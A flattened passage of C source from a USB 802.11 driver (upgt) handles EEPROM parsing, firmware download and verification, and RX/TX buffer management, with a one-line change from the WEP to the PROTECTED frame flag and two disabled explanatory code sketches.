UPGT_DEBUG_FW, "EEPROM freq3 len=%d\n", option_len); upgt_eeprom_parse_freq3(sc, eeprom_option->data, option_len); break; case UPGT_EEPROM_TYPE_FREQ4: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM freq4 len=%d\n", option_len); upgt_eeprom_parse_freq4(sc, eeprom_option->data, option_len); break; case UPGT_EEPROM_TYPE_FREQ5: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM freq5 len=%d\n", option_len); break; case UPGT_EEPROM_TYPE_FREQ6: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM freq6 len=%d\n", option_len); upgt_eeprom_parse_freq6(sc, eeprom_option->data, option_len); break; case UPGT_EEPROM_TYPE_END: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM end len=%d\n", option_len); option_end = 1; break; case UPGT_EEPROM_TYPE_OFF: DPRINTF(sc, UPGT_DEBUG_FW, "%s: EEPROM off without end option\n", __func__); return (EIO); default: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM unknown type 0x%04x len=%d\n", option_type, option_len); break; } /* jump to next EEPROM option */ eeprom_option = (struct upgt_eeprom_option *) (eeprom_option->data + option_len); } return (0); } static void upgt_eeprom_parse_freq3(struct upgt_softc *sc, uint8_t *data, int len) { struct upgt_eeprom_freq3_header *freq3_header; struct upgt_lmac_freq3 *freq3; int i; int elements; int flags; unsigned channel; freq3_header = (struct upgt_eeprom_freq3_header *)data; 
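/*
 * Editor's note: illustrative sketch only, not part of this change.  The
 * EEPROM image walked by upgt_eeprom_parse() above is a list of
 * little-endian type/length/data options: the length is stored in 16-bit
 * words (the driver subtracts one word before converting it to bytes), the
 * payload follows, and the next option starts right after the payload
 * until an end marker is seen.  The standalone walker below restates that
 * traversal with the same sanity checks; struct tlv_opt and tlv_walk() are
 * hypothetical names, and the block is kept out of the build with #if 0.
 */
#if 0
struct tlv_opt {
	uint16_t	type;			/* little-endian */
	uint16_t	len;			/* in 16-bit words */
	uint8_t		data[];
};

static int
tlv_walk(const uint8_t *image, size_t size, uint16_t end_type,
    void (*visit)(uint16_t, const uint8_t *, size_t))
{
	const uint8_t *p = image;

	while (p + sizeof(struct tlv_opt) <= image + size) {
		const struct tlv_opt *opt = (const void *)p;
		uint16_t type = le16toh(opt->type);
		uint16_t words = le16toh(opt->len);
		size_t len;

		if (words < 2)
			return (-1);		/* nonsensical length */
		len = (size_t)(words - 1) * sizeof(uint16_t);
		if (p + sizeof(*opt) + len > image + size)
			return (-1);		/* option runs past the image */
		if (type == end_type)
			return (0);		/* clean end of options */
		visit(type, opt->data, len);
		p = opt->data + len;		/* jump to the next option */
	}
	return (-1);				/* no end marker found */
}
#endif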
freq3 = (struct upgt_lmac_freq3 *)(freq3_header + 1); flags = freq3_header->flags; elements = freq3_header->elements; DPRINTF(sc, UPGT_DEBUG_FW, "flags=0x%02x elements=%d\n", flags, elements); if (elements >= (int)(UPGT_EEPROM_SIZE / sizeof(freq3[0]))) return; for (i = 0; i < elements; i++) { channel = ieee80211_mhz2ieee(le16toh(freq3[i].freq), 0); if (channel >= IEEE80211_CHAN_MAX) continue; sc->sc_eeprom_freq3[channel] = freq3[i]; DPRINTF(sc, UPGT_DEBUG_FW, "frequence=%d, channel=%d\n", le16toh(sc->sc_eeprom_freq3[channel].freq), channel); } } void upgt_eeprom_parse_freq4(struct upgt_softc *sc, uint8_t *data, int len) { struct upgt_eeprom_freq4_header *freq4_header; struct upgt_eeprom_freq4_1 *freq4_1; struct upgt_eeprom_freq4_2 *freq4_2; int i; int j; int elements; int settings; int flags; unsigned channel; freq4_header = (struct upgt_eeprom_freq4_header *)data; freq4_1 = (struct upgt_eeprom_freq4_1 *)(freq4_header + 1); flags = freq4_header->flags; elements = freq4_header->elements; settings = freq4_header->settings; /* we need this value later */ sc->sc_eeprom_freq6_settings = freq4_header->settings; DPRINTF(sc, UPGT_DEBUG_FW, "flags=0x%02x elements=%d settings=%d\n", flags, elements, settings); if (elements >= (int)(UPGT_EEPROM_SIZE / sizeof(freq4_1[0]))) return; for (i = 0; i < elements; i++) { channel = ieee80211_mhz2ieee(le16toh(freq4_1[i].freq), 0); if (channel >= IEEE80211_CHAN_MAX) continue; freq4_2 = (struct upgt_eeprom_freq4_2 *)freq4_1[i].data; for (j = 0; j < settings; j++) { sc->sc_eeprom_freq4[channel][j].cmd = freq4_2[j]; sc->sc_eeprom_freq4[channel][j].pad = 0; } DPRINTF(sc, UPGT_DEBUG_FW, "frequence=%d, channel=%d\n", le16toh(freq4_1[i].freq), channel); } } void upgt_eeprom_parse_freq6(struct upgt_softc *sc, uint8_t *data, int len) { struct upgt_lmac_freq6 *freq6; int i; int elements; unsigned channel; freq6 = (struct upgt_lmac_freq6 *)data; elements = len / sizeof(struct upgt_lmac_freq6); DPRINTF(sc, UPGT_DEBUG_FW, "elements=%d\n", elements); if (elements >= (int)(UPGT_EEPROM_SIZE / sizeof(freq6[0]))) return; for (i = 0; i < elements; i++) { channel = ieee80211_mhz2ieee(le16toh(freq6[i].freq), 0); if (channel >= IEEE80211_CHAN_MAX) continue; sc->sc_eeprom_freq6[channel] = freq6[i]; DPRINTF(sc, UPGT_DEBUG_FW, "frequence=%d, channel=%d\n", le16toh(sc->sc_eeprom_freq6[channel].freq), channel); } } static void upgt_eeprom_parse_hwrx(struct upgt_softc *sc, uint8_t *data) { struct upgt_eeprom_option_hwrx *option_hwrx; option_hwrx = (struct upgt_eeprom_option_hwrx *)data; sc->sc_eeprom_hwrx = option_hwrx->rxfilter - UPGT_EEPROM_RX_CONST; DPRINTF(sc, UPGT_DEBUG_FW, "hwrx option value=0x%04x\n", sc->sc_eeprom_hwrx); } static int upgt_eeprom_read(struct upgt_softc *sc) { struct upgt_data *data_cmd; struct upgt_lmac_mem *mem; struct upgt_lmac_eeprom *eeprom; int block, error, offset; UPGT_LOCK(sc); usb_pause_mtx(&sc->sc_mtx, 100); offset = 0; block = UPGT_EEPROM_BLOCK_SIZE; while (offset < UPGT_EEPROM_SIZE) { DPRINTF(sc, UPGT_DEBUG_FW, "request EEPROM block (offset=%d, len=%d)\n", offset, block); data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { UPGT_UNLOCK(sc); return (ENOBUFS); } /* * Transmit the URB containing the CMD data. 
*/ memset(data_cmd->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data_cmd->buf; mem->addr = htole32(sc->sc_memaddr_frame_start + UPGT_MEMSIZE_FRAME_HEAD); eeprom = (struct upgt_lmac_eeprom *)(mem + 1); eeprom->header1.flags = 0; eeprom->header1.type = UPGT_H1_TYPE_CTRL; eeprom->header1.len = htole16(( sizeof(struct upgt_lmac_eeprom) - sizeof(struct upgt_lmac_header)) + block); eeprom->header2.reqid = htole32(sc->sc_memaddr_frame_start); eeprom->header2.type = htole16(UPGT_H2_TYPE_EEPROM); eeprom->header2.flags = 0; eeprom->offset = htole16(offset); eeprom->len = htole16(block); data_cmd->buflen = sizeof(*mem) + sizeof(*eeprom) + block; mem->chksum = upgt_chksum_le((uint32_t *)eeprom, data_cmd->buflen - sizeof(*mem)); upgt_bulk_tx(sc, data_cmd); error = mtx_sleep(sc, &sc->sc_mtx, 0, "eeprom_request", hz); if (error != 0) { device_printf(sc->sc_dev, "timeout while waiting for EEPROM data\n"); UPGT_UNLOCK(sc); return (EIO); } offset += block; if (UPGT_EEPROM_SIZE - offset < block) block = UPGT_EEPROM_SIZE - offset; } UPGT_UNLOCK(sc); return (0); } /* * When a rx data came in the function returns a mbuf and a rssi values. */ static struct mbuf * upgt_rxeof(struct usb_xfer *xfer, struct upgt_data *data, int *rssi) { struct mbuf *m = NULL; struct upgt_softc *sc = usbd_xfer_softc(xfer); struct upgt_lmac_header *header; struct upgt_lmac_eeprom *eeprom; uint8_t h1_type; uint16_t h2_type; int actlen, sumlen; usbd_xfer_status(xfer, &actlen, &sumlen, NULL, NULL); UPGT_ASSERT_LOCKED(sc); if (actlen < 1) return (NULL); /* Check only at the very beginning. */ if (!(sc->sc_flags & UPGT_FLAG_FWLOADED) && (memcmp(data->buf, "OK", 2) == 0)) { sc->sc_flags |= UPGT_FLAG_FWLOADED; wakeup_one(sc); return (NULL); } if (actlen < (int)UPGT_RX_MINSZ) return (NULL); /* * Check what type of frame came in. */ header = (struct upgt_lmac_header *)(data->buf + 4); h1_type = header->header1.type; h2_type = le16toh(header->header2.type); if (h1_type == UPGT_H1_TYPE_CTRL && h2_type == UPGT_H2_TYPE_EEPROM) { eeprom = (struct upgt_lmac_eeprom *)(data->buf + 4); uint16_t eeprom_offset = le16toh(eeprom->offset); uint16_t eeprom_len = le16toh(eeprom->len); DPRINTF(sc, UPGT_DEBUG_FW, "received EEPROM block (offset=%d, len=%d)\n", eeprom_offset, eeprom_len); memcpy(sc->sc_eeprom + eeprom_offset, data->buf + sizeof(struct upgt_lmac_eeprom) + 4, eeprom_len); /* EEPROM data has arrived in time, wakeup. */ wakeup(sc); } else if (h1_type == UPGT_H1_TYPE_CTRL && h2_type == UPGT_H2_TYPE_TX_DONE) { DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: received 802.11 TX done\n", __func__); upgt_tx_done(sc, data->buf + 4); } else if (h1_type == UPGT_H1_TYPE_RX_DATA || h1_type == UPGT_H1_TYPE_RX_DATA_MGMT) { DPRINTF(sc, UPGT_DEBUG_RECV, "%s: received 802.11 RX data\n", __func__); m = upgt_rx(sc, data->buf + 4, le16toh(header->header1.len), rssi); } else if (h1_type == UPGT_H1_TYPE_CTRL && h2_type == UPGT_H2_TYPE_STATS) { DPRINTF(sc, UPGT_DEBUG_STAT, "%s: received statistic data\n", __func__); /* TODO: what could we do with the statistic data? */ } else { /* ignore unknown frame types */ DPRINTF(sc, UPGT_DEBUG_INTR, "received unknown frame type 0x%02x\n", header->header1.type); } return (m); } /* * The firmware awaits a checksum for each frame we send to it. * The algorithm used therefor is uncommon but somehow similar to CRC32. 
*/ static uint32_t upgt_chksum_le(const uint32_t *buf, size_t size) { size_t i; uint32_t crc = 0; for (i = 0; i < size; i += sizeof(uint32_t)) { crc = htole32(crc ^ *buf++); crc = htole32((crc >> 5) ^ (crc << 3)); } return (crc); } static struct mbuf * upgt_rx(struct upgt_softc *sc, uint8_t *data, int pkglen, int *rssi) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct upgt_lmac_rx_desc *rxdesc; struct mbuf *m; /* * don't pass packets to the ieee80211 framework if the driver isn't * RUNNING. */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) return (NULL); /* access RX packet descriptor */ rxdesc = (struct upgt_lmac_rx_desc *)data; /* create mbuf which is suitable for strict alignment archs */ KASSERT((pkglen + ETHER_ALIGN) < MCLBYTES, ("A current mbuf storage is small (%d)", pkglen + ETHER_ALIGN)); m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (m == NULL) { device_printf(sc->sc_dev, "could not create RX mbuf\n"); return (NULL); } m_adj(m, ETHER_ALIGN); memcpy(mtod(m, char *), rxdesc->data, pkglen); /* trim FCS */ m->m_len = m->m_pkthdr.len = pkglen - IEEE80211_CRC_LEN; m->m_pkthdr.rcvif = ifp; if (ieee80211_radiotap_active(ic)) { struct upgt_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; tap->wr_rate = upgt_rx_rate(sc, rxdesc->rate); tap->wr_antsignal = rxdesc->rssi; } ifp->if_ipackets++; DPRINTF(sc, UPGT_DEBUG_RX_PROC, "%s: RX done\n", __func__); *rssi = rxdesc->rssi; return (m); } static uint8_t upgt_rx_rate(struct upgt_softc *sc, const int rate) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const uint8_t cck_upgt2rate[4] = { 2, 4, 11, 22 }; static const uint8_t ofdm_upgt2rate[12] = { 2, 4, 11, 22, 12, 18, 24, 36, 48, 72, 96, 108 }; if (ic->ic_curmode == IEEE80211_MODE_11B && !(rate < 0 || rate > 3)) return cck_upgt2rate[rate & 0xf]; if (ic->ic_curmode == IEEE80211_MODE_11G && !(rate < 0 || rate > 11)) return ofdm_upgt2rate[rate & 0xf]; return (0); } static void upgt_tx_done(struct upgt_softc *sc, uint8_t *data) { struct ifnet *ifp = sc->sc_ifp; struct upgt_lmac_tx_done_desc *desc; int i, freed = 0; UPGT_ASSERT_LOCKED(sc); desc = (struct upgt_lmac_tx_done_desc *)data; for (i = 0; i < UPGT_TX_MAXCOUNT; i++) { struct upgt_data *data_tx = &sc->sc_tx_data[i]; if (data_tx->addr == le32toh(desc->header2.reqid)) { upgt_mem_free(sc, data_tx->addr); data_tx->ni = NULL; data_tx->addr = 0; data_tx->m = NULL; DPRINTF(sc, UPGT_DEBUG_TX_PROC, "TX done: memaddr=0x%08x, status=0x%04x, rssi=%d, ", le32toh(desc->header2.reqid), le16toh(desc->status), le16toh(desc->rssi)); DPRINTF(sc, UPGT_DEBUG_TX_PROC, "seq=%d\n", le16toh(desc->seq)); freed++; } } if (freed != 0) { sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; UPGT_UNLOCK(sc); upgt_start(ifp); UPGT_LOCK(sc); } } static void upgt_mem_free(struct upgt_softc *sc, uint32_t addr) { int i; for (i = 0; i < sc->sc_memory.pages; i++) { if (sc->sc_memory.page[i].addr == addr) { sc->sc_memory.page[i].used = 0; return; } } device_printf(sc->sc_dev, "could not free memory address 0x%08x\n", addr); } static int upgt_fw_load(struct upgt_softc *sc) { const struct firmware *fw; struct upgt_data *data_cmd; struct upgt_fw_x2_header *x2; char start_fwload_cmd[] = { 0x3c, 0x0d }; int error = 0; size_t offset; int bsize; int n; uint32_t crc32; fw = firmware_get(upgt_fwname); if (fw == NULL) { device_printf(sc->sc_dev, "could not read microcode %s\n", upgt_fwname); return (EIO); } UPGT_LOCK(sc); /* send firmware start load command */ data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { 
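/*
 * Editor's note: illustrative sketch only, not part of this change.  Every
 * command this driver queues is a struct upgt_lmac_mem header followed by
 * the command payload, and mem->chksum is computed with upgt_chksum_le()
 * (defined above) over the payload only, i.e. over buflen - sizeof(*mem)
 * bytes taken in 32-bit steps.  The helper below merely restates that
 * convention for a generic payload; mydrv_fill_cmd() is a hypothetical
 * name and the block is kept out of the build with #if 0.
 */
#if 0
static void
mydrv_fill_cmd(struct upgt_softc *sc, struct upgt_data *data_cmd,
    const void *payload, size_t payload_len)
{
	struct upgt_lmac_mem *mem;

	memset(data_cmd->buf, 0, MCLBYTES);
	mem = (struct upgt_lmac_mem *)data_cmd->buf;
	mem->addr = htole32(sc->sc_memaddr_frame_start +
	    UPGT_MEMSIZE_FRAME_HEAD);
	/* The payload (an upgt_lmac_* structure) follows the mem header. */
	memcpy(mem + 1, payload, payload_len);
	data_cmd->buflen = sizeof(*mem) + payload_len;
	/* The checksum covers everything after the memory header. */
	mem->chksum = upgt_chksum_le((uint32_t *)(mem + 1),
	    data_cmd->buflen - sizeof(*mem));
}
#endif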
error = ENOBUFS; goto fail; } data_cmd->buflen = sizeof(start_fwload_cmd); memcpy(data_cmd->buf, start_fwload_cmd, data_cmd->buflen); upgt_bulk_tx(sc, data_cmd); /* send X2 header */ data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { error = ENOBUFS; goto fail; } data_cmd->buflen = sizeof(struct upgt_fw_x2_header); x2 = (struct upgt_fw_x2_header *)data_cmd->buf; memcpy(x2->signature, UPGT_X2_SIGNATURE, UPGT_X2_SIGNATURE_SIZE); x2->startaddr = htole32(UPGT_MEMADDR_FIRMWARE_START); x2->len = htole32(fw->datasize); x2->crc = upgt_crc32_le((uint8_t *)data_cmd->buf + UPGT_X2_SIGNATURE_SIZE, sizeof(struct upgt_fw_x2_header) - UPGT_X2_SIGNATURE_SIZE - sizeof(uint32_t)); upgt_bulk_tx(sc, data_cmd); /* download firmware */ for (offset = 0; offset < fw->datasize; offset += bsize) { if (fw->datasize - offset > UPGT_FW_BLOCK_SIZE) bsize = UPGT_FW_BLOCK_SIZE; else bsize = fw->datasize - offset; data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { error = ENOBUFS; goto fail; } n = upgt_fw_copy((const uint8_t *)fw->data + offset, data_cmd->buf, bsize); data_cmd->buflen = bsize; upgt_bulk_tx(sc, data_cmd); DPRINTF(sc, UPGT_DEBUG_FW, "FW offset=%d, read=%d, sent=%d\n", offset, n, bsize); bsize = n; } DPRINTF(sc, UPGT_DEBUG_FW, "%s: firmware downloaded\n", __func__); /* load firmware */ data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { error = ENOBUFS; goto fail; } crc32 = upgt_crc32_le(fw->data, fw->datasize); *((uint32_t *)(data_cmd->buf) ) = crc32; *((uint8_t *)(data_cmd->buf) + 4) = 'g'; *((uint8_t *)(data_cmd->buf) + 5) = '\r'; data_cmd->buflen = 6; upgt_bulk_tx(sc, data_cmd); /* waiting 'OK' response. */ usbd_transfer_start(sc->sc_xfer[UPGT_BULK_RX]); error = mtx_sleep(sc, &sc->sc_mtx, 0, "upgtfw", 2 * hz); if (error != 0) { device_printf(sc->sc_dev, "firmware load failed\n"); error = EIO; } DPRINTF(sc, UPGT_DEBUG_FW, "%s: firmware loaded\n", __func__); fail: UPGT_UNLOCK(sc); firmware_put(fw, FIRMWARE_UNLOAD); return (error); } static uint32_t upgt_crc32_le(const void *buf, size_t size) { uint32_t crc; crc = ether_crc32_le(buf, size); /* apply final XOR value as common for CRC-32 */ crc = htole32(crc ^ 0xffffffffU); return (crc); } /* * While copying the version 2 firmware, we need to replace two characters: * * 0x7e -> 0x7d 0x5e * 0x7d -> 0x7d 0x5d */ static int upgt_fw_copy(const uint8_t *src, char *dst, int size) { int i, j; for (i = 0, j = 0; i < size && j < size; i++) { switch (src[i]) { case 0x7e: dst[j] = 0x7d; j++; dst[j] = 0x5e; j++; break; case 0x7d: dst[j] = 0x7d; j++; dst[j] = 0x5d; j++; break; default: dst[j] = src[i]; j++; break; } } return (i); } static int upgt_mem_init(struct upgt_softc *sc) { int i; for (i = 0; i < UPGT_MEMORY_MAX_PAGES; i++) { sc->sc_memory.page[i].used = 0; if (i == 0) { /* * The first memory page is always reserved for * command data. 
*/ sc->sc_memory.page[i].addr = sc->sc_memaddr_frame_start + MCLBYTES; } else { sc->sc_memory.page[i].addr = sc->sc_memory.page[i - 1].addr + MCLBYTES; } if (sc->sc_memory.page[i].addr + MCLBYTES >= sc->sc_memaddr_frame_end) break; DPRINTF(sc, UPGT_DEBUG_FW, "memory address page %d=0x%08x\n", i, sc->sc_memory.page[i].addr); } sc->sc_memory.pages = i; DPRINTF(sc, UPGT_DEBUG_FW, "memory pages=%d\n", sc->sc_memory.pages); return (0); } static int upgt_fw_verify(struct upgt_softc *sc) { const struct firmware *fw; const struct upgt_fw_bra_option *bra_opt; const struct upgt_fw_bra_descr *descr; const uint8_t *p; const uint32_t *uc; uint32_t bra_option_type, bra_option_len; size_t offset; int bra_end = 0; int error = 0; fw = firmware_get(upgt_fwname); if (fw == NULL) { device_printf(sc->sc_dev, "could not read microcode %s\n", upgt_fwname); return EIO; } /* * Seek to beginning of Boot Record Area (BRA). */ for (offset = 0; offset < fw->datasize; offset += sizeof(*uc)) { uc = (const uint32_t *)((const uint8_t *)fw->data + offset); if (*uc == 0) break; } for (; offset < fw->datasize; offset += sizeof(*uc)) { uc = (const uint32_t *)((const uint8_t *)fw->data + offset); if (*uc != 0) break; } if (offset == fw->datasize) { device_printf(sc->sc_dev, "firmware Boot Record Area not found\n"); error = EIO; goto fail; } DPRINTF(sc, UPGT_DEBUG_FW, "firmware Boot Record Area found at offset %d\n", offset); /* * Parse Boot Record Area (BRA) options. */ while (offset < fw->datasize && bra_end == 0) { /* get current BRA option */ p = (const uint8_t *)fw->data + offset; bra_opt = (const struct upgt_fw_bra_option *)p; bra_option_type = le32toh(bra_opt->type); bra_option_len = le32toh(bra_opt->len) * sizeof(*uc); switch (bra_option_type) { case UPGT_BRA_TYPE_FW: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_FW len=%d\n", bra_option_len); if (bra_option_len != UPGT_BRA_FWTYPE_SIZE) { device_printf(sc->sc_dev, "wrong UPGT_BRA_TYPE_FW len\n"); error = EIO; goto fail; } if (memcmp(UPGT_BRA_FWTYPE_LM86, bra_opt->data, bra_option_len) == 0) { sc->sc_fw_type = UPGT_FWTYPE_LM86; break; } if (memcmp(UPGT_BRA_FWTYPE_LM87, bra_opt->data, bra_option_len) == 0) { sc->sc_fw_type = UPGT_FWTYPE_LM87; break; } device_printf(sc->sc_dev, "unsupported firmware type\n"); error = EIO; goto fail; case UPGT_BRA_TYPE_VERSION: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_VERSION len=%d\n", bra_option_len); break; case UPGT_BRA_TYPE_DEPIF: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_DEPIF len=%d\n", bra_option_len); break; case UPGT_BRA_TYPE_EXPIF: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_EXPIF len=%d\n", bra_option_len); break; case UPGT_BRA_TYPE_DESCR: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_DESCR len=%d\n", bra_option_len); descr = (const struct upgt_fw_bra_descr *)bra_opt->data; sc->sc_memaddr_frame_start = le32toh(descr->memaddr_space_start); sc->sc_memaddr_frame_end = le32toh(descr->memaddr_space_end); DPRINTF(sc, UPGT_DEBUG_FW, "memory address space start=0x%08x\n", sc->sc_memaddr_frame_start); DPRINTF(sc, UPGT_DEBUG_FW, "memory address space end=0x%08x\n", sc->sc_memaddr_frame_end); break; case UPGT_BRA_TYPE_END: DPRINTF(sc, UPGT_DEBUG_FW, "UPGT_BRA_TYPE_END len=%d\n", bra_option_len); bra_end = 1; break; default: DPRINTF(sc, UPGT_DEBUG_FW, "unknown BRA option len=%d\n", bra_option_len); error = EIO; goto fail; } /* jump to next BRA option */ offset += sizeof(struct upgt_fw_bra_option) + bra_option_len; } DPRINTF(sc, UPGT_DEBUG_FW, "%s: firmware verified", __func__); fail: firmware_put(fw, FIRMWARE_UNLOAD); return (error); } static void 
upgt_bulk_tx(struct upgt_softc *sc, struct upgt_data *data) { UPGT_ASSERT_LOCKED(sc); STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); UPGT_STAT_INC(sc, st_tx_pending); usbd_transfer_start(sc->sc_xfer[UPGT_BULK_TX]); } static int upgt_device_reset(struct upgt_softc *sc) { struct upgt_data *data; char init_cmd[] = { 0x7e, 0x7e, 0x7e, 0x7e }; UPGT_LOCK(sc); data = upgt_getbuf(sc); if (data == NULL) { UPGT_UNLOCK(sc); return (ENOBUFS); } memcpy(data->buf, init_cmd, sizeof(init_cmd)); data->buflen = sizeof(init_cmd); upgt_bulk_tx(sc, data); usb_pause_mtx(&sc->sc_mtx, 100); UPGT_UNLOCK(sc); DPRINTF(sc, UPGT_DEBUG_FW, "%s: device initialized\n", __func__); return (0); } static int upgt_alloc_tx(struct upgt_softc *sc) { int i; STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); for (i = 0; i < UPGT_TX_MAXCOUNT; i++) { struct upgt_data *data = &sc->sc_tx_data[i]; data->buf = ((uint8_t *)sc->sc_tx_dma_buf) + (i * MCLBYTES); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); UPGT_STAT_INC(sc, st_tx_inactive); } return (0); } static int upgt_alloc_rx(struct upgt_softc *sc) { int i; STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); for (i = 0; i < UPGT_RX_MAXCOUNT; i++) { struct upgt_data *data = &sc->sc_rx_data[i]; data->buf = ((uint8_t *)sc->sc_rx_dma_buf) + (i * MCLBYTES); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); } return (0); } static int upgt_detach(device_t dev) { struct upgt_softc *sc = device_get_softc(dev); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; unsigned int x; /* * Prevent further allocations from RX/TX/CMD * data lists and ioctls */ UPGT_LOCK(sc); sc->sc_flags |= UPGT_FLAG_DETACHED; STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); UPGT_UNLOCK(sc); upgt_stop(sc); callout_drain(&sc->sc_led_ch); callout_drain(&sc->sc_watchdog_ch); /* drain USB transfers */ for (x = 0; x != UPGT_N_XFERS; x++) usbd_transfer_drain(sc->sc_xfer[x]); /* free data buffers */ UPGT_LOCK(sc); upgt_free_rx(sc); upgt_free_tx(sc); UPGT_UNLOCK(sc); /* free USB transfers and some data buffers */ usbd_transfer_unsetup(sc->sc_xfer, UPGT_N_XFERS); ieee80211_ifdetach(ic); if_free(ifp); mtx_destroy(&sc->sc_mtx); return (0); } static void upgt_free_rx(struct upgt_softc *sc) { int i; for (i = 0; i < UPGT_RX_MAXCOUNT; i++) { struct upgt_data *data = &sc->sc_rx_data[i]; data->buf = NULL; data->ni = NULL; } } static void upgt_free_tx(struct upgt_softc *sc) { int i; for (i = 0; i < UPGT_TX_MAXCOUNT; i++) { struct upgt_data *data = &sc->sc_tx_data[i]; if (data->ni != NULL) ieee80211_free_node(data->ni); data->buf = NULL; data->ni = NULL; } } static void upgt_abort_xfers_locked(struct upgt_softc *sc) { int i; UPGT_ASSERT_LOCKED(sc); /* abort any pending transfers */ for (i = 0; i < UPGT_N_XFERS; i++) usbd_transfer_stop(sc->sc_xfer[i]); } static void upgt_abort_xfers(struct upgt_softc *sc) { UPGT_LOCK(sc); upgt_abort_xfers_locked(sc); UPGT_UNLOCK(sc); } #define UPGT_SYSCTL_STAT_ADD32(c, h, n, p, d) \ SYSCTL_ADD_UINT(c, h, OID_AUTO, n, CTLFLAG_RD, p, 0, d) static void upgt_sysctl_node(struct upgt_softc *sc) { struct sysctl_ctx_list *ctx; struct sysctl_oid_list *child; struct sysctl_oid *tree; struct upgt_stat *stats; stats = &sc->sc_stat; ctx = device_get_sysctl_ctx(sc->sc_dev); child = SYSCTL_CHILDREN(device_get_sysctl_tree(sc->sc_dev)); tree = SYSCTL_ADD_NODE(ctx, child, OID_AUTO, "stats", CTLFLAG_RD, NULL, 
"UPGT statistics"); child = SYSCTL_CHILDREN(tree); UPGT_SYSCTL_STAT_ADD32(ctx, child, "tx_active", &stats->st_tx_active, "Active numbers in TX queue"); UPGT_SYSCTL_STAT_ADD32(ctx, child, "tx_inactive", &stats->st_tx_inactive, "Inactive numbers in TX queue"); UPGT_SYSCTL_STAT_ADD32(ctx, child, "tx_pending", &stats->st_tx_pending, "Pending numbers in TX queue"); } #undef UPGT_SYSCTL_STAT_ADD32 static struct upgt_data * _upgt_getbuf(struct upgt_softc *sc) { struct upgt_data *bf; bf = STAILQ_FIRST(&sc->sc_tx_inactive); if (bf != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_tx_inactive, next); UPGT_STAT_DEC(sc, st_tx_inactive); } else bf = NULL; if (bf == NULL) DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: %s\n", __func__, "out of xmit buffers"); return (bf); } static struct upgt_data * upgt_getbuf(struct upgt_softc *sc) { struct upgt_data *bf; UPGT_ASSERT_LOCKED(sc); bf = _upgt_getbuf(sc); if (bf == NULL) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: stop queue\n", __func__); ifp->if_drv_flags |= IFF_DRV_OACTIVE; } return (bf); } static struct upgt_data * upgt_gettxbuf(struct upgt_softc *sc) { struct upgt_data *bf; UPGT_ASSERT_LOCKED(sc); bf = upgt_getbuf(sc); if (bf == NULL) return (NULL); bf->addr = upgt_mem_alloc(sc); if (bf->addr == 0) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, UPGT_DEBUG_XMIT, "%s: no free prism memory!\n", __func__); STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); UPGT_STAT_INC(sc, st_tx_inactive); if (!(ifp->if_drv_flags & IFF_DRV_OACTIVE)) ifp->if_drv_flags |= IFF_DRV_OACTIVE; return (NULL); } return (bf); } static int upgt_tx_start(struct upgt_softc *sc, struct mbuf *m, struct ieee80211_node *ni, struct upgt_data *data) { struct ieee80211vap *vap = ni->ni_vap; int error = 0, len; struct ieee80211_frame *wh; struct ieee80211_key *k; struct ifnet *ifp = sc->sc_ifp; struct upgt_lmac_mem *mem; struct upgt_lmac_tx_desc *txdesc; UPGT_ASSERT_LOCKED(sc); upgt_set_led(sc, UPGT_LED_BLINK); /* * Software crypto. */ wh = mtod(m, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m); if (k == NULL) { device_printf(sc->sc_dev, "ieee80211_crypto_encap returns NULL.\n"); error = EIO; goto done; } /* in case packet header moved, reset pointer */ wh = mtod(m, struct ieee80211_frame *); } /* Transmit the URB containing the TX data. */ memset(data->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data->buf; mem->addr = htole32(data->addr); txdesc = (struct upgt_lmac_tx_desc *)(mem + 1); if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT) { /* mgmt frames */ txdesc->header1.flags = UPGT_H1_FLAGS_TX_MGMT; /* always send mgmt frames at lowest rate (DS1) */ memset(txdesc->rates, 0x10, 